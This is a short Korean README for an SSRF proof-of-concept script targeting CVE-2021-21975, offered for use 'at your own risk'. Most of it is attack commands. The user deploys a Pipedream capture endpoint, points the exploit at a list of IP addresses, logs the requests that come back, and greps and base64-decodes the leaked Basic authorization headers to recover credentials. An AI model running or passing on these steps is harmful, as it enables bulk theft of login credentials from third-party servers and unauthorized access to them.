
#SSRF-POC - ssrf에서 인증 정보 유출까지
#먼저 pd 클라이언트를 구성하세요.
#이제 ./pd deploy http-new-requests 를 실행하세요.
#이제 스크립트에서 pipedream http 요청(예: Randomstring.m.pipedream.net)을 교체하세요.
#이것을 별도의 터미널에서 실행하세요 - ./pd logs new-requests | tee -a req.txt
#그리고 이제 이것을 다른 터미널에서 실행하세요 - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"이것은 취약점이 공개되었던 몇 달 전에 만들어진 초기 개념 증명입니다. 그러니 본인의 책임 하에 사용하세요." :V
#크레딧 @wabaf3t @D0rkerDevil